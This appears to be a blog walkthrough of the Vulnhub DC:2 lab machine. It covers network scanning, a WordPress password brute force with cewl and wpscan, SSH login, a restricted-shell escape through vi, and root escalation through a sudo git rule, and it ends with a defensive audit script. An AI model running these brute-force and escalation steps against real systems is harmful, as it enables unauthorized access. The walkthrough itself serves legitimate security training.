DC: 2 Hacking Challenge Walkthrough (Vulnhub)

Hello Community!

We completed the first Vulnhub machine of the DC series by DCAU in my last post. Let's move to the next challenge of the same series, i.e. DC:2. Like DC:1, there are many flags, but the goal is to find the final flag in the /root directory. According to the author, the machine is designed for beginners, and knowledge of the Linux command line is a must.

Let's go!

Setup and Configurations

You can download the VM from the Vulnhub website. Run the VM in VirtualBox (or VMware Player). I ran this VM in VirtualBox with a Host-only network configuration.

You can configure the Host-only Network in VirtualBox from File > Host Network Manager as shown below:

Finding Our Target

Let's run Nmap to enumerate the network and find the IP address of our target.

root@kali:~# nmap -sn 192.168.56.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-21 00:11 IST
Nmap scan report for 192.168.56.2
Host is up (0.000067s latency).
MAC Address: 08:00:27:6B:82:6D (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.5
Host is up (0.00023s latency).
MAC Address: 08:00:27:9A:59:02 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.06 seconds

So 192.168.56.5 is our target's IP (192.168.56.2 is the DHCP server and 192.168.56.1 is the IP of the adapter on the local machine, as shown in Setup and Configurations).

The Attack

First we need to find out what services are running on our target machine. As usual, we will use Nmap for that.

root@kali:~# nmap -p- -A 192.168.56.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-21 00:27 IST
Nmap scan report for 192.168.56.5
Host is up (0.00038s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Did not follow redirect to http://dc-2/
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey: 
| 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
| 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
| 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 08:00:27:9A:59:02 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.38 ms 192.168.56.5

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.34 seconds

So it has the Apache web server running, and an SSH service on port 7744 rather than the default port 22. We will first look into the web server, but before doing that we will add the following entry to the /etc/hosts file, as advised by the author:

192.168.56.5 dc-2

This maps the name dc-2 to the target's IP address. The web server redirects to http://dc-2/ (see the http-title line in the Nmap output), so without this entry the name would not resolve. Whenever we open a web page such as http://dc-2/xyz on our laptop, the system looks in the hosts file and knows that it has to go to http://192.168.56.5/xyz.

OK! Now let's navigate to the website. It has five pages, and one is of interest to us.

Flag 1 basically gives a hint that in a dictionary attack the usual word lists may not work, so we need to be cewl. Cewl? Is it cool? Well, maybe. It reminded me of the tool cewl in Kali, which is used for making word lists from a website's contents.

Now we need to find the target that is prone to a dictionary attack. I ran Nikto to get more info and got this.

root@kali:~# nikto -h http://dc-2 | tee nikto.txt
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.5
+ Target Hostname: dc-2
+ Target Port: 80
+ Start Time: 2019-05-23 00:09:02 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://dc-2/>; rel=shortlink
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80 
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: Wordpress login found
+ 7373 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2019-05-23 00:09:26 (GMT5.5) (24 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

So we have the WordPress login page, wp-login.php. It may be prone to a dictionary attack. Let's make a word list with cewl and crack the login page with wpscan.

root@kali:~# cewl -w dc.txt dc-2
CeWL 5.4.3 (Arkanoid) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

Here -w gives the name of the file the word list is written to.

Before we can brute-force passwords, we need to know the users. Wpscan will do both jobs for us in a single scan. I will list only the relevant output (the complete output was quite large).

root@kali:~# wpscan --url http://dc-2 -P dc.txt -e
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.3.1
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_____________________________________________________________

[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - jerry / adipiscing 
[SUCCESS] - tom / parturient 
Trying admin / the Time: 00:00:55 <===============================================================================> (644 / 644) 100.00% Time: 00:00:55
Trying admin / see Time: 00:00:55 <===============================================================================> (644 / 644) 100.00% Time: 00:00:55
WARNING: Your progress bar is currently at 644 out of 644 and cannot be incremented. In v2.0.0 this will become a ProgressBar::InvalidProgressError.
Trying admin / see Time: 00:00:55 <===============================================================================> (644 / 644) 100.00% Time: 00:00:55
Trying admin / log Time: 00:00:55 <===============================================================================> (644 / 644) 100.00% Time: 00:00:55
WARNING: Your progress bar is currently at 644 out of 644 and cannot be incremented. In v2.0.0 this will become a ProgressBar::InvalidProgressError.
Trying admin / log Time: 00:00:55 <===============================================================================> (644 / 644) 100.00% Time: 00:00:55

[i] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient

So three users were detected: jerry, tom and admin. The passwords of the two users other than admin were cracked.

There was one more interesting entry in the Nikto output: /wp-links-opml.php, which reveals the version of WordPress.

It has WordPress version 4.7.10. When searching for vulnerabilities I found https://www.cvedetails.com/cve/CVE-2019-8942 (Remote Code Execution), and yeah, it has a Metasploit module for that! So what are we waiting for? I used the exploit/multi/http/wp_crop_rce module and ran exploit.

msf5 exploit(multi/http/wp_crop_rce) > exploit

[*] Started reverse TCP handler on 192.168.56.1:4444 
[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress
[*] Exploit completed, but no session was created.

The target is indeed a WordPress target but we now have to find another way around.

After doing a lot of things, I finally tried logging in through SSH with Tom's credentials and it worked.

root@kali:~# ssh -p 7744 tom@dc-2
The authenticity of host '[dc-2]:7744 ([192.168.56.5]:7744)' can't be established.
ECDSA key fingerprint is SHA256:ZbyT03GNDQgEmA5AMiTX2N685NTzZuOoyMDIA+DW1qU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[dc-2]:7744,[192.168.56.5]:7744' (ECDSA) to the list of known hosts.
tom@dc-2's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$ ls
flag3.txt usr

I tried to open flag3.txt, but what I found was that the cat command does not exist. Surely we are stuck in a restricted shell. I checked the PATH variable and found out that we can use vi.

tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
tom@DC-2:~$ echo $PATH
/home/tom/usr/bin
tom@DC-2:~$ ls /home/tom/usr/bin
less ls scp vi
tom@DC-2:~$ vi flag3.txt

flag3.txt gives us the following hint:

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

We need to change user to jerry, but the su command is not in our list of allowed commands. Here is where knowledge of Linux and of how to escape restricted shells helped me! I used vi to escape the restricted shell.

~ 
~ 
~ 
:set shell=/bin/bash

and then run the shell:

~ 
~ 
:shell

And that worked. I then exported the PATH variable so that I can execute all commands.

tom@DC-2:~$ export PATH=/bin:/usr/bin:$PATH
tom@DC-2:~$ cat flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

We can see that cat is working now. Let's su to jerry.

tom@DC-2:~$ su jerry
Password:

jerry@DC-2:/home/tom$ cd /home/jerry
jerry@DC-2:~$ ls
flag4.txt
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet.

You still need to get the final flag (the only flag that really counts!!!).

No hints here - you're on your own now. :-)

Go on - git outta here!!!!

No hints now? But still: git outta here!! Maybe git does not require the root password. Let's check with sudo -l.

jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git

Yes, let's finish this! The help command of git comes with a text editor where we can run commands.

jerry@DC-2:~$ sudo git help add

And Boom!! we got a root shell.
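Both the rbash escape through vi and the root shell through sudo git come from the same misconfiguration: a constrained user is handed a program that can start other programs from inside its own interface. The audit sketch below is an added example, not part of the original walkthrough; the SHELL_CAPABLE set and the function names are assumptions of this example, and the inputs are the sudo -l rule and the /home/tom/usr/bin listing shown above.

```python
import os
import re

# Illustrative, non-exhaustive set (an assumption of this example): programs
# that can start a subshell or run another program from inside their own UI.
SHELL_CAPABLE = {"vi", "vim", "ed", "less", "more", "man", "git", "awk", "find", "scp"}

# One rule line of `sudo -l` output: (run-as) [TAG: ...] command[, command ...]
SUDO_RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


def audit_sudo(sudo_l_output):
    """Return (runas, command, nopasswd) for every rule that grants ALL or a
    shell-capable binary."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = SUDO_RULE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m["tags"]
        for cmd in filter(None, (c.strip() for c in m["cmds"].split(","))):
            exe = cmd.split()[0]
            if exe == "ALL" or os.path.basename(exe) in SHELL_CAPABLE:
                findings.append((m["runas"], exe, nopasswd))
    return findings


def audit_restricted_path(allowed_binaries):
    """Return the binaries offered to an rbash user that undo the restriction."""
    return sorted(b for b in allowed_binaries if os.path.basename(b) in SHELL_CAPABLE)


# Inputs copied from the session shown on this page.
SUDO_L = """User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git
"""
RBASH_BIN = "less ls scp vi".split()

if __name__ == "__main__":
    print("sudo rules to review:", audit_sudo(SUDO_L))
    print("rbash binaries to review:", audit_restricted_path(RBASH_BIN))
```

Every finding means the user effectively holds an unrestricted shell under the rule's run-as identity, so the fix is to drop the binary from the rule or the restricted PATH, or to replace it with a purpose-built wrapper that takes no user-controlled arguments.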

That is it, guys. If you have any doubts or want me to solve any particular CTF, do mention it in the comments.
